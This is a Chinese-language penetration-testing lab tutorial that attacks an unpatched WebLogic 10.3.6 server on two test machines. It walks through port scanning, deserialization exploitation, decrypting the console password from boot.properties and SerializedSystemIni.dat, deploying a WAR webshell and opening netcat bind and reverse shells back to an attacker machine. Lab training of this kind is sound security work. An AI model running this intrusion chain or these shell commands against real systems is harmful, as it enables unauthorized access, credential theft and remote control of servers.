Web滲透實驗:基於Weblogic的一系列漏洞
*本文原創作者:zhukaiang7,本文屬FreeBuf原創獎勵計劃,未經許可禁止轉載
前言
雙休剛剛過去,利用假期2天時間成功上了個王者,變成了好友第一,美滋滋,什麼時候能成為滲透技術第一就好了。
一上班就接到了老大的要求,需要給最近入職的小弟深入培養一下滲透的技術,所以有了這篇文章,這次的環境如下:
1. 攻擊機windows10 192.168.2.104
2. 靶機ip:
192.168.2.109(linux Ubantu) 192.168.2.111(windows2008R264位)
為了讓讀者看的更直觀更容易理解,我分別配置了2個靶機
第一步:啟動靶機服務
分別為linux和windows
靶機配置過程過於簡單這裡直接省略,有問題可以留言,我看到會回覆的。
第二步:發現weblogic服務
當我們擁有客戶授權的情況下,一般採取nmap,masscan甚至是Python自己編寫的埠掃描工具,各有優缺。
網上開源很多,這裡從網上拿來一款開源的掃描器(基於python2)。
程式碼如下:
# -*- coding: utf-8 -*- import optparse from threading import * from socket import * screenLock=Semaphore(value=1) def connScan(tgtHost,tgtPort): try: connSkt = socket(AF_INET,SOCK_STREAM) connSkt.connect((tgtHost,tgtPort)) connSkt.send('ViolentPython\r\n') results=connSkt.recv(100) screenLock.acquire()#列印前的加鎖操作。 print ('[+.+] %d/tcp 開啟'% tgtPort+''+str(results)).decode('UTF-8').encode('GBK') # print ('[+.+] '+str(results)) connSkt.close() except: screenLock.acquire() print ("[-.-] %s/tcp 關閉"%tgtPort).decode('UTF-8').encode('GBK') finally: screenLock.release()#終止阻塞其他執行緒前需要執行的程式碼。 connSkt.close() def portScan(tgtHost,tgtPorts): try: tgtIP=gethostbyname(tgtHost) except: print ("[-.-] 報告老大不能解析目標 '%s': 未知目標"%tgtHost).decode('UTF-8').encode('GBK') return try: tgtName=gethostbyaddr(tgtIP) print ('\n[+.+] 已經獲得目標地址:'+tgtName[0]).decode('UTF-8').encode('GBK') except: print ('\n[+.+] 已經獲得目標地址:'+tgtIP).decode('UTF-8').encode('GBK') setdefaulttimeout(1) for tgtPort in tgtPorts: t=Thread(target=connScan,args=(tgtHost,int(tgtPort)))#多執行緒 t.start() def main(): print ("皮皮蝦正在探路請耐心等待...").decode('UTF-8').encode('GBK') parser=optparse.OptionParser('usage %prog -H' +'<target host> -p <target port>') parser.add_option('-H',dest='tgtHost',type='string',help='specify target host') parser.add_option('-P',dest='tgtPort',type='string',help='specify target post') (options,args)=parser.parse_args() tgtHost = options.tgtHost tgtPorts = str(options.tgtPort).split(',') if (tgtHost==None)|(tgtPorts[0]==None): print ('[-.-] 老大你忘了輸入目標地址和埠啦.').decode('UTF-8').encode('GBK') exit(0) portScan(tgtHost,tgtPorts) if __name__ == '__main__': print ("歡迎使用本掃描器,我是皮皮蝦").decode('UTF-8').encode('GBK') main()
具體編寫指南可以參考原文連結,適合剛開始學習python的朋友們
https://bbs.ichunqiu.com/thread-40994-1-1.html
掃描結果為關閉,換個埠試試
為什麼為造成這種情況呢,分析原因:
可能因為我們這個py版埠掃描是呼叫的socket模組,給埠傳送一些垃圾資料,如果服務端返回資料才代表我們這個埠開放,所以7001埠沒有給我們想要的資料,指令碼就認為它沒有開放。
祭出我們強大的Nmap
發現我們伺服器靶機確實是開放了7001埠的,^…^。
第三步:對weblogic服務滲透的思路
發現weblogic服務,第一反應是常見的能getshell的漏洞
比如後臺弱口令,密碼是base64編碼的,可以用burpsuite增加編碼引數,也可以用網上開源的一些工具進行爆破,然後war包部署拿shell。
再比如對weblogic的T3協議,反序列化命令執行,直接執行系統命令。
像目錄樣例操縱和拒絕服務這些雞肋的漏洞我們這暫且不談。這個靠的是滲透經驗,就像上次參加一個眾測,網站出現了action結尾的網址時,立馬直接struts2命令執行掃了一下直接getshell菜刀連上,高危漏洞吧,當然了,跟大佬們一起挖洞眾測,這麼簡單的漏洞,比的就是速度了,後面有空會分享一些挖洞的經驗,這裡暫且不提。
第四步:對weblogic服務的滲透
我們這裡安裝的weblogic是10.3.6,沒有打補丁,也沒有禁用t3協議。我們可以使用工具進行反序列化利用。
(windows)
(linux)
然後執行一系列命令檢視我們入侵靶機的環境
因為是靶機,直接給的administrator許可權,也開放了3389埠,當然了,在實戰過程中,我一開始很少連線3389上去,不安全也不可靠。
常規套路,net user增加使用者,給許可權等,注意如果不是公網的伺服器,Web服務埠是映射出來的化,我們這邊還需要給我們自己這邊的攻擊機彈個shell,有很多工具,這裡用瑞士軍刀演示。
因為是windows我們先上傳瑞士軍刀到伺服器上,然後使用命令,轉發cmd到我們的攻擊機上。從weblogic反序列化得到的執行許可權無法反彈,所以我們需要先上傳一個大馬來執行命令。因為是靶機並沒有部署web環境,我們再來看控制檯。
控制檯密碼在目錄
C:\Oracle\Middleware\user_projects\domains\base_domain\servers\AdminServer\security\boot.properties
得到了加密的使用者密碼:
我們開始破解它
第五步:破解weblogic控制檯密碼
jdk安裝說明:
https://www.cnblogs.com/eagle6688/p/7873477.html
破解工具:
https://codeload.github.com/NetSPI/WebLogicPasswordDecryptor/zip/master
外掛:
http://repo2.maven.org/maven2/org/bouncycastle/bcprov-ext-jdk16/1.46/bcprov-ext-jdk16-1.46.jar
將外掛複製到目錄
C:\Program Files\Java\jdk1.8.0_201\jre\lib\ext(jdk環境)
破解 weblogic 控制檯密碼需要 2 個條件
SerializedSystemIni.dat 金鑰檔案
(c:\Oracle\Middleware\user_projects\domains\base_domain\security\SerializedSystem Ini.dat)
boot.properties 控制檯使用者名稱和密碼
(C:\Oracle\Middleware\user_projects\domains\base_domain\servers\AdminServer\security\boot.properties)
編譯下載的破解檔案
Javac WebLogicPasswordDecryptor.java
破解
記住 破解的時候java和javac 版本一定要一樣,如果是後面新安裝的java和之前的java會衝突,需要到系統變數中修改一下,否則會出現下圖的報錯
破解成功之後的
賬號:weblogic
密碼:weblogic123
原來是弱口令,嘿嘿。所以大家下次注意,遇到這種控制檯,第一反應就是去手動嘗試一些弱口令。當然也可以使用暴力破解
可以使用python指令碼:
https://github.com/b4zinga/Explib/blob/master/weblogic.py
有了賬號密碼,就是常規套路部署war包了。
/**/
製作war包大馬,把大馬以zip格式壓縮然後重新命名為xxx.war即可
1、登入控制檯(以Linux靶機為例)
訪問登陸控制檯
http://192.168.43.22:7001/console
選擇上傳檔案
上傳我們製作的war包大馬
上傳的路徑
然後一直下一步
啟用更改
選擇剛部署的專案啟動
隨後訪問 http://192.168.43.22:7001/cmd/cmd.jsp 即可開啟大馬
(linux)
(windows)
第六步:彈shell
在windows下:
靶機執行:
nc.exe -l -p 8888 -t -e cmd.exe
本機執行:
nc.exe -nvv 192.168.2.111 8888
在linux下:
靶機執行:
nc 192.168.2.104 8888 -e /bin/sh
本機執行:
nc.exe -lvnp 8888
我們看到-e引數報錯了這是因為
Ubuntu上預設安裝的是netcat-openbsd,而不是經典的netcat-traditional
sudo apt-get -y install netcat-traditional
然後sudo update-alternatives –config nc,選擇2
Linux靶機執行:nc -vlp 8888 -e /bin/bash
本機執行:nc.exe 192.168.2.109 8888